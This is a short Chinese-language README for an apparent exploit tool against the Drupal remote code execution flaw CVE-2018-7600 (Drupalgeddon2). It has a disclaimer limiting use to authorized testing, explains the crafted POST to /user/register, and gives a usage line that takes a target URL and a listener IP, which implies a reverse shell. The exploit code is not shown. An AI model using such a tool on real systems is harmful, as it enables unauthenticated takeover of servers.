免责声明:
本项目仅供教育和授权渗透测试使用。
请勿在未获得明确书面授权的系统上使用此代码。
未经授权使用是非法的,并可能受到法律惩罚。
作者不对任何滥用此工具的行为承担任何责任。
该Python3脚本利用了**CVE-2018-7600 (Drupalgeddon2)漏洞——一个影响多个Drupal版本的严重远程代码执行(RCE)**漏洞。该漏洞允许攻击者在无需认证的情况下在易受攻击的服务器上执行任意命令。该漏洞利用程序通过向/user/register端点发送精心构造的POST请求,利用Drupal的AJAX表单渲染来执行系统命令。
此外,该脚本还包括:
Drupal 7.x 和 8.x(2018年3月修补版本之前)存在漏洞。
详细信息请参阅:
🔗 Drupal安全公告
安装所需的Python模块:
pip install requests termcolor
python3 exploit.py <TARGET_URL> <LISTENER_IP>